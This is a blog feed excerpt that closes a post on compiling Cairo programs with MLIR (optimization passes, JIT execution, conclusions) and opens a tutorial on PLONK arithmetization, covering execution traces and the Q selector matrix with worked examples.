&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `convert_reconcile_unrealized_casts`: this pass simplifies and eliminates unrealized conversion cast operations, commonly introduced by partial dialect conversions, that transitively convert a value to another value of the same type.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The optimization passes we will apply are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `canonicalize`: Canonicalize operations. This pass performs various types of canonicalizations over a set of operations by iteratively applying the canonicalization patterns of all loaded dialects until either a fixpoint is reached or the maximum number of iterations&#x2F;rewrites is exhausted. Canonicalization is an important part of compiler IR design: it makes it easier to implement reliable compiler transformations and to reason about what is better or worse in the code, and it forces interesting discussions about the goals of a particular level of IR. Most compilers have canonicalization passes, and sometimes they have many different ones (e.g., inst-combine, dag combine, etc, in LLVM). Because MLIR is a multi-level IR, it can provide a single canonicalization infrastructure and reuse it across many different IRs that it represents.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `inliner`: the inliner pass inlines function calls.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `symbol_dce`: this pass deletes all symbols that are found to be unreachable.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `cse`: this pass implements a generalized algorithm for common sub-expression elimination.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `sccp`: this pass implements a general algorithm for sparse conditional constant propagation. This algorithm detects values that are known to be constant and optimistically propagates this throughout the IR. Any values proven to be constant are replaced and removed if possible.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;execution&quot;&gt;Execution&lt;&#x2F;h4&gt;
&lt;p&gt;We now have an in-memory representation of our program in optimized MLIR. How can we execute our code?&lt;&#x2F;p&gt;
&lt;p&gt;MLIR provides an ExecutionEngine, which takes a module and expects it to be translatable to LLVM IR, and then uses the LLVM JIT ExecutionEngine to compile and run it.&lt;br &#x2F;&gt;
The engine must also know the entry point for execution, and the following example is from a benchmark of the Fibonacci function:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let program = ProgramParser::new().parse(include_str!(&amp;quot;programs&#x2F;fib.sierra&amp;quot;)).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let engine = ExecutionEngine::new(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;compiler.module,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;[&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;format!(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;quot;{}&#x2F;libmlir_c_runner_utils.{}&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            run_llvm_config(&amp;amp;[&amp;quot;--libdir&amp;quot;]).trim(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            env!(&amp;quot;SHARED_LIB_EXT&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        env!(&amp;quot;S2M_UTILS_PATH&amp;quot;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    false,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;unsafe {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    engine.invoke_packed(&amp;quot;fib::fib::main&amp;quot;, &amp;amp;mut []).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;&#x2F;h2&gt;
&lt;p&gt;As we said, MLIR is a young project.&lt;br &#x2F;&gt;
Although there are enough case studies and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;mlir.llvm.org&#x2F;users&#x2F;&quot;&gt;users&lt;&#x2F;a&gt; to make one look at the sunset sky and muse, “This is the way,” there are a few caveats.&lt;&#x2F;p&gt;
&lt;p&gt;First, although it is clear that the project has made an effort, documentation is scarce.&lt;br &#x2F;&gt;
The API is documented, and there are great getting started tutorials, but if you stray off the signaled path, you end up looking at test code, other projects, and trial and error.&lt;&#x2F;p&gt;
&lt;p&gt;Second, the project is written in C++.&lt;br &#x2F;&gt;
It provides a C-compatible API with which to fashion bindings in your language, but it is under development and unstable.&lt;br &#x2F;&gt;
The Python bindings are also under development and not enabled by default.&lt;br &#x2F;&gt;
The Rust bindings are somewhat auto-generated and not very mature.&lt;br &#x2F;&gt;
You may end up having to build some tools to build this tool to build the tool you want to ship, also known as yak shaving of an especially hairy breed.&lt;&#x2F;p&gt;
&lt;p&gt;Third, like any powerful tool that allows one to operate on a high level of abstraction, it requires you to be able to bridge abstraction layers and truly understand your goals and the obstacles you face in reaching them.&lt;br &#x2F;&gt;
Knowledge of compiler technology and the techniques and vocabulary involved is a must.&lt;br &#x2F;&gt;
Perhaps with more maturity, other tools can be fashioned on top of it to hide complexity for more specific domains.&lt;&#x2F;p&gt;
&lt;p&gt;We would like to salute and thank the team and community behind LLVM and MLIR, and Cairo.&lt;br &#x2F;&gt;
Foundational technologies are rare, difficult to develop, and require great insight and vision to come to terms with.&lt;br &#x2F;&gt;
These stones feel like the base on which great things will rest.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;iT9Qv1X.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;references-and-resources&quot;&gt;References and Resources&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [MLIR Homepage](https:&#x2F;&#x2F;mlir.llvm.org&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 2019 EuroLLVM Developers’ Meeting: T. Shpeisman &amp;amp; C. Lattner “MLIR: Multi-Level Intermediate Representation Compiler Infrastructure” [Video](https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=qzljG6DKgic) and [Slides](https:&#x2F;&#x2F;llvm.org&#x2F;devmtg&#x2F;2019-04&#x2F;slides&#x2F;Keynote-ShpeismanLattner-MLIR.pdf)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MLIR Tutorial [Video](https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=Y4SvqTtOIDk) and [Slides](https:&#x2F;&#x2F;llvm.org&#x2F;devmtg&#x2F;2020-09&#x2F;slides&#x2F;MLIR_Tutorial.pdf)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Yizhou Shan&amp;#39;s notes on MLIR](http:&#x2F;&#x2F;lastweek.io&#x2F;notes&#x2F;MLIR&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Lei Zhang&amp;#39;s &amp;quot;Compilers and IRs: LLVM IR, SPIR-V, and MLIR&amp;quot;](https:&#x2F;&#x2F;www.lei.chat&#x2F;posts&#x2F;compilers-and-irs-llvm-ir-spirv-and-mlir&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Starkware glossary: STARKs, StarkEx, and StarkNet](https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;starks-starkex-and-starknet-9a426680745a)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Starkware: Cairo 1.0](https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;cairo-1-0-aa96eefb19a0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Starkware: Cairo 1.0 is here](https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;cairo-1-0-is-here-7e1ac8377038)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;</description>
      </item>
      <item>
          <title>All you wanted to know about Plonk</title>
          <pubDate>Mon, 01 May 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/all-you-wanted-to-know-about-plonk/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/all-you-wanted-to-know-about-plonk/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/all-you-wanted-to-know-about-plonk/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Zero-knowledge proofs, also known as ZKPs, are becoming popular due to their numerous applications in delegating computations to untrusted servers and addressing scalability issues in decentralized ledgers. By using ZKPs, we can prove the validity of a given computation without revealing sensitive information, and the proof is short and quickly verifiable. STARKs (scalable transparent arguments of knowledge) and SNARKs (succinct non-interactive arguments of knowledge) are cryptographic primitives that allow us to transform computer programs into relations between polynomials and prove their correct execution, and have numerous applications in decentralized finances, governance, and computation. For more background on these topics, you can look at our previous posts on &lt;a href=&quot;&#x2F;lambdaworks-or-how-we-decided-to-created-our-zksnarks-library-and-a-stark-prover&#x2F;&quot;&gt;STARKs&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;SNARKs&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Due to its efficiency and flexibility, PLONK is a popular cryptographic proving system within the Zero Knowledge (ZK) community, having customized versions such as Halo2 and Kimchi. It enables the verification of complex computations executed by untrusted parties through the transformation of programs into circuit representations. The system relies on arithmetization, which converts logical circuits into polynomial expressions. The main idea behind arithmetization is to express the computation as a set of polynomial equations. The solutions to these equations correspond to the outputs of the circuit. In this section, we will delve into how arithmetization works in PLONK and the protocol used to generate and verify proofs.&lt;&#x2F;p&gt;
&lt;p&gt;The original paper can be found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;953.pdf&quot;&gt;here&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;notation&quot;&gt;Notation&lt;&#x2F;h2&gt;
&lt;p&gt;We will use the following notation throughout the article. If you are unfamiliar with some of these concepts, you can look at our &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;math survival kit&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The symbol $\mathbb{F}$ denotes a finite field. It is fixed throughout. The symbol $\omega$ represents a primitive $n$-th root of unity in $\mathbb{F}$, that is, $\omega^n = 1$ and $\omega^k \neq 1$ for $0 &amp;lt; k &amp;lt; n$.&lt;&#x2F;p&gt;
&lt;p&gt;All polynomials have coefficients in $\mathbb{F}$, and the variable is usually denoted by $X$; we denote this set as $\mathbb{F} [X]$. We represent polynomials by single letters like $p, a, b, z$. We only mark them as $z(X)$ when we want to emphasize that it is a polynomial in $X$ or we need to define a polynomial from another one explicitly. For example, when composing a polynomial $z$ with the polynomial $\omega X$, the result is denoted by $z’ := z(\omega X)$. The symbol $’$ is &lt;strong&gt;not&lt;&#x2F;strong&gt; used to indicate derivatives.&lt;&#x2F;p&gt;
&lt;p&gt;When interpolating at a domain $H = \{h_0 , \dots , h_n \} \subset \mathbb{F}$, the symbols $L_i$ denote the Lagrange basis. That is, $L_i$ is the polynomial such that $L_i (h_j) = 0$ for all $j \neq i$ and $L_i (h_i) = 1$.&lt;&#x2F;p&gt;
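As a concrete check of these defining properties, here is a small Python sketch. The field size $p = 17$ and root of unity $\omega = 4$ are illustrative choices of ours, not values from the protocol:

```python
# Lagrange basis over an interpolation domain H in F_17.
# omega = 4 is a primitive 4th root of unity mod 17.
p = 17
H = [pow(4, k, p) for k in range(4)]  # [1, 4, 16, 13]

def lagrange(i: int, x: int) -> int:
    """Evaluate L_i(x) = prod_{j != i} (x - h_j) / (h_i - h_j) in F_p."""
    num, den = 1, 1
    for j, hj in enumerate(H):
        if j != i:
            num = num * (x - hj) % p
            den = den * (H[i] - hj) % p
    return num * pow(den, -1, p) % p

# The defining property: L_i(h_i) = 1 and L_i(h_j) = 0 for j != i.
assert all(lagrange(i, H[j]) == (1 if i == j else 0)
           for i in range(4) for j in range(4))
```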
&lt;p&gt;If $M$ is a matrix, then $M_{i,j}$ denotes the value at the row $i$ and column $j$.&lt;&#x2F;p&gt;
&lt;h1 id=&quot;the-ideas-and-components&quot;&gt;The ideas and components&lt;&#x2F;h1&gt;
&lt;h2 id=&quot;programs-our-toy-example&quot;&gt;Programs. Our toy example&lt;&#x2F;h2&gt;
&lt;p&gt;We’ll use the following toy program throughout this post for better clarity.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;INPUT:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  x&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;PRIVATE INPUT:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  e&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;OUTPUT:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  e * x + x - 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The observant reader will have noticed that we could write this program as $(e + 1) \times x - 1$, which is more concise. But the way it is written now serves better to explain the arithmetization of PLONK, so we’ll stick to it.&lt;&#x2F;p&gt;
&lt;p&gt;The idea is that the verifier holds some value $x$, say $x=3$. He gives it to the prover. She executes the program using her chosen value $e$ and sends the output value, say $8$, along with a proof $\pi$ demonstrating the correct execution of the program and obtaining the correct output.&lt;&#x2F;p&gt;
&lt;p&gt;In the context of PLONK, both the inputs and outputs of the program are considered &lt;em&gt;public inputs&lt;&#x2F;em&gt;. This may sound odd, but it is because these are the inputs to the verification algorithm. This is the algorithm that takes, in this case, the tuple $(3, 8, \pi)$ and outputs &lt;em&gt;Accept&lt;&#x2F;em&gt; if the toy program was executed with input $x=3$, some private value $e$ not revealed to the verifier, and out came $8$. Otherwise, it outputs &lt;em&gt;Reject&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;PLONK can be used to delegate program executions to untrusted parties, but it can also be used as proof of knowledge. A prover could use our program to demonstrate that she knows the multiplicative inverse of some value $x$ in the finite field without revealing it. She would do it by sending the verifier the tuple $(x, 0, \pi)$, where $\pi$ is the proof of the execution of our toy program.&lt;&#x2F;p&gt;
&lt;p&gt;This is pointless in our toy example because any verifier can efficiently invert field elements on their own. But change our program to the following, and you get a proof of knowledge of the preimage of a SHA256 digest.&lt;&#x2F;p&gt;
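To see why output $0$ certifies knowledge of an inverse: $e \cdot x + x - 1 = 0$ rearranges to $(e + 1) \cdot x = 1$, so $e + 1$ is the multiplicative inverse of $x$. A quick sanity check over a small prime field (the choice $p = 17$ is ours, for illustration):

```python
p = 17          # small illustrative prime field
x = 3           # the verifier's public input

# The prover picks e so that e + 1 is the inverse of x modulo p.
e = (pow(x, -1, p) - 1) % p

# Running the toy program in the field yields 0 exactly in that case.
output = (e * x + x - 1) % p
assert output == 0
assert (e + 1) * x % p == 1
```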
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;PRIVATE INPUT:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  e&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;OUTPUT:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  SHA256(e)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here there’s no input aside from the prover’s private input. As we mentioned, the output $h$ of the program is then part of the inputs to the verification algorithm, which, in this case, takes $(h, \pi)$.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;plonk-arithmetization&quot;&gt;PLONK Arithmetization&lt;&#x2F;h2&gt;
&lt;p&gt;This process takes the circuit of a particular program and produces a set of mathematical tools that we can use to generate and verify proofs of execution. The final result will be a set of eight polynomials. To compute them, we first need to define two matrices. We call them the $Q$ matrix and the $V$ matrix. The polynomials and the matrices depend only on the program and not on any particular execution. So they can be computed once and used for every execution instance. To understand what they are helpful for, we need to start with &lt;em&gt;execution traces&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;circuits-and-execution-traces&quot;&gt;Circuits and execution traces&lt;&#x2F;h3&gt;
&lt;p&gt;See the program as a sequence of gates with a left operand, a right operand, and an output. The two most basic gates are multiplication and addition gates. In our example, one way to see our toy program is as a composition of three gates.&lt;&#x2F;p&gt;
&lt;p&gt;Gate 1: left: $e$, right: $x$, output: $u = e \times x$&lt;br &#x2F;&gt;
Gate 2: left: $u$, right: $x$, output: $v = u + x$&lt;br &#x2F;&gt;
Gate 3: left: $v$, right: $1$, output: $w = v - 1$&lt;&#x2F;p&gt;
&lt;p&gt;On executing the circuit, all these variables take concrete values. We can put all that information in table form: a matrix with the left, right, and output values of all the gates, one row per gate. We call the columns of this matrix $A, B, C$. Let’s build them for $x=3$ and $e=2$. We get $u=6$, $v=9$ and $w=8$. So the first matrix is:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The last gate subtracts a constant value that is part of the program, not a variable. So it has only one input instead of two, and its output is the result of subtracting $1$ from that input. That’s why it is handled a bit differently from the second gate. The symbol “-” in the $B$ column is a consequence of that: it means “any value”, because it won’t change the result. In the next section, we’ll see how we implement that. We’ll use this notation whenever any value can be put there; if we have to choose one, we’ll default to $0$.&lt;&#x2F;p&gt;
&lt;p&gt;What we got is a valid execution trace. Not all matrices of that shape will be the trace of the execution of the program. The matrices $Q$ and $V$ will be the tools to distinguish between valid and invalid execution traces.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-q-matrix&quot;&gt;The $Q$ matrix&lt;&#x2F;h3&gt;
&lt;p&gt;As we said, it only depends on the program itself and not on any particular evaluation. It has one row for each gate, and its columns are called $Q_L, Q_R, Q_O, Q_M, Q_C$. They encode the rows’ gate type and are designed to satisfy the following.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Claim:&lt;&#x2F;strong&gt; If columns $A, B, C$ correspond to a valid evaluation of the circuit, then for all $i$, the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} = 0$$&lt;&#x2F;p&gt;
&lt;p&gt;This is better seen with examples. The following row represents a multiplication gate:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$Q_L$&lt;&#x2F;th&gt;&lt;th&gt;$Q_R$&lt;&#x2F;th&gt;&lt;th&gt;$Q_M$&lt;&#x2F;th&gt;&lt;th&gt;$Q_O$&lt;&#x2F;th&gt;&lt;th&gt;$Q_C$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;And the row in the trace matrix that corresponds to the execution of that gate is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The equation in the claim for that row is $2 \times 0 + 3 \times 0 + 2 \times 3 \times 1 + 6 \times (-1) + 0$, which equals $0$. The next gate is an addition gate, represented by this row:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$Q_L$&lt;&#x2F;th&gt;&lt;th&gt;$Q_R$&lt;&#x2F;th&gt;&lt;th&gt;$Q_M$&lt;&#x2F;th&gt;&lt;th&gt;$Q_O$&lt;&#x2F;th&gt;&lt;th&gt;$Q_C$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The corresponding row in the trace matrix is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;And the equation of the claim is $6 \times 1 + 3 \times 1 + 6 \times 3 \times 0 + 9 \times (-1) + 0$, which adds up to $0$. Our last gate adds a constant. Addition by a constant $C$ can be represented by the row&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$Q_L$&lt;&#x2F;th&gt;&lt;th&gt;$Q_R$&lt;&#x2F;th&gt;&lt;th&gt;$Q_M$&lt;&#x2F;th&gt;&lt;th&gt;$Q_O$&lt;&#x2F;th&gt;&lt;th&gt;$Q_C$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;C&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;In our case, $C=-1$. The corresponding row in the execution trace is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;And the equation of the claim is $9 \times 1 + 0 \times 0 + 9 \times 0 \times 0 + 8 \times (-1) + C$, which with $C=-1$ is also zero.&lt;&#x2F;p&gt;
&lt;p&gt;Putting it all together, the entire $Q$ matrix is&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$Q_L$&lt;&#x2F;th&gt;&lt;th&gt;$Q_R$&lt;&#x2F;th&gt;&lt;th&gt;$Q_M$&lt;&#x2F;th&gt;&lt;th&gt;$Q_O$&lt;&#x2F;th&gt;&lt;th&gt;$Q_C$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;td&gt;-1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
